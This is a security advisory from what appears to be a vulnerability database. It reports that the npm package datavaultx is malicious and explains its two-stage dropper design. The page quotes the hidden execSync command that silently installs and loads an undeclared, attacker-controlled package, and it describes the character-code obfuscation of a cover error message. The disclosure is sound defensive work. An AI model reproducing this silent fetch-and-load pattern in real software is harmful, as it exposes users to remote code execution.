VDB
KO

MAL-2026-10460

Malicious code in datavaultx (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bbf831f155eb2a6d04427e5cc3cd239055844e80c3b02576a5d546e4e7ab42b6) On require of the package's main entry (auth.js -> lib/writer.js), the module attempts require('auth-gen-next'); on failure it invokes execSync('npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent') and then requires the freshly installed module from../../auth-gen-next/index.js. The fetched package is not declared in this package's dependencies, so its contents are entirely attacker-controlled and can change at any time without a datavaultx release. lib/writer.js additionally constructs a cover-story error string ('Error: This environment is not supported...') via a long chain of String.fromCharCode calls, shown only if the silent install fails. The suppressed logging, undeclared dependency, and character-code obfuscation of the failure message together indicate a two-stage dropper design in which the visible package is a thin shim that pulls its real payload from a separately-published module at load time.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / datavaultx

No fixed version published yet for datavaultx (npm). Pin to a known-safe version or switch to an alternative.

References